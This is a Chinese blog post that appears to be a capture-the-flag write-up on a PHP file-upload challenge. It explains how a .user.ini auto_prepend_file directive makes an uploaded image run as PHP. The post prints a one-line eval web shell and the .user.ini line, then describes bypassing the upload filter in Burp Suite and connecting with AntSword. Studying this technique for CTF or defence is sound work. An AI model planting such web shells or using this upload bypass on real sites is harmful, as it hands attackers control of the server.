CTF之文件上传(.user.ini)

.user.ini 本身不是漏洞,但它经常被攻击者利用来实施攻击,属于配置滥用或权限提升类型的安全问题。

具体的攻击手法:

攻击者最常利用的是 auto_prepend_fileauto_append_file 这两个指令。

攻击步骤:

  1. 找到入口:攻击者先通过其他漏洞(如程序漏洞、弱密码等)获得在网站目录上传文件的权限。

  2. 上传恶意文件 :上传一个包含后门代码的图片或文本文件,比如 evil.jpg,内容其实是 <?php @eval($_REQUEST['cmd']); ?>

  3. 创建或修改.user.ini :在上传目录创建或修改 .user.ini 文件,内容为:

  4. auto_prepend_file = evil.jpg

  5. 后果 :现在该目录下的每一个PHP文件在执行时,都会自动先执行 evil.jpg 中的恶意代码,攻击者就获得了整个目录的控制权。


CTF之文件上传:利用.user.ini文件获取控制权限

1.看到这个题目,就知道要上传图片来获取权限

2.这时我构造了一个带有恶意代码的图片文件,命名为a.jpg,但是直接上传是不可能获取权限的,服务器看到.jpg, .txt, .html这些扩展名,会认为它们是静态文件(图片、文本、网页),它会直接读取文件的内容,并发送给浏览器,不会调用 PHP 解释器。

这时.user.ini配置文件就起作用了,PHP 解释器开始工作前,先读取并应用了目录下的.user.ini配置文件,利用.user.ini的 auto_prepend_file 指令,将一个本不会被执行的图片木马(a.jpg)变成在每个 PHP 文件执行前都会自动运行的前置文件,从而劫持整个目录的执行流程。它先要去执行a.jpg 文件,虽然 a.jpg扩展名是 .jpg,但此时它是在 PHP 解释器内部被包含的,PHP 解释器不在乎文件扩展名,它只认文件内容里的 <?php ?> 标签。于是,它成功地执行了a.jpg里的后门代码 eval($_REQUEST['a'])。(a是下面蚁剑连接网站的参数)

3.因为系统无法将文件命名为.user.ini,只能暂时命名为user.ini,所以需要burpsuite拦截请求,将文件名改为.user.ini,并且将Content-type改为image/jpg类型才能被上传。

这时.user.ini就上传成功了

而a.jpg本来就是image/jpg类型,肯定能直接上传

4.蚁剑连接http://61.147.171.35:53191/uploads/index.php(不是直接连接 a.jpg,而是连接一个该目录下肯定存在的正常 PHP 文件(index.php)),并设置参数为a(这个密码对应木马代码中的 $_REQUEST['a'] 的参数名)。

连接时

  1. (1)当你点击"测试连接"时,蚁剑向 http://61.147.171.35:53191/uploads/index.php 发送一个 HTTP 请求。

  2. (2)服务器准备执行 /uploads/index.php

  3. (3)在执行前,PHP 引擎读取并应用了 /uploads/ 目录下的 .user.ini 设置。根据 auto_prepend_file=a.jpg 指令,PHP 引擎首先去包含并执行 a.jpg 文件。PHP 解释器会解析 a.jpg 中的 <?php ... ?> 标签,于是 eval($_REQUEST['a']) 这行代码被执行。

  4. (5)此时,蚁剑发送的请求中正好携带了参数 a,其值是一段经过 Base64 编码的、用于测试连接的 PHP 代码(比如执行系统命令,列出当前目录的所有文件和详细信息)。eval 函数执行了这段代码,并将结果返回给蚁剑。

  5. (6)蚁剑收到响应,确认后门生效,显示"连接成功"。

获取权限后的操作

  1. 连接成功后,蚁剑的界面(如截图所示)就变成了一个可视化的文件管理器。可以像操作本地文件夹一样,浏览服务器上的文件,最终找到并打开 /flag 文件,获取到flag内容,完成题目。
相关推荐
黎阳之光7 分钟前
黎阳之光:数智技术赋能水利“平急两用” 筑牢水利工程安全防线
大数据·人工智能·算法·安全·数字孪生
兄弟加油,别颓废了。1 小时前
curl详细使用方法
安全
昊星自动化2 小时前
昊星自动化 以房间为单位气流控制筑牢实验室安全屏障
安全·实验室建设·文丘里阀·房间通风控制
code_pgf2 小时前
Jetson Orin NX 16G设备上配置AI服务自动启动的方案,包括Ollama、llama-server和OpenClaw Gateway三个组件
数据库·人工智能·安全·gateway·边缘计算·llama
Coding的叶子2 小时前
Windows 下 如何安全地安装 龙虾(OpenClaw)
windows·安全·ai·openclaw·龙虾·龙虾安装·龙虾实验室
bughunter2 小时前
LiteLLM 供应链攻击深度复盘:一个 .pth 文件如何窃取你所有云凭证
python·安全
代码飞一会儿2 小时前
ctf之web代码执行攻防——如何悄无声息窥探你的内心
安全
上海云盾王帅2 小时前
Web安全与风险全景解读:从基础概念到实战防御
安全·web安全
tingting01192 小时前
hydra的简介及使用
安全
Web极客码2 小时前
从 OpenClaw 的安全危机到 DefenseClaw:构建 AI Agent 的治理层
人工智能·安全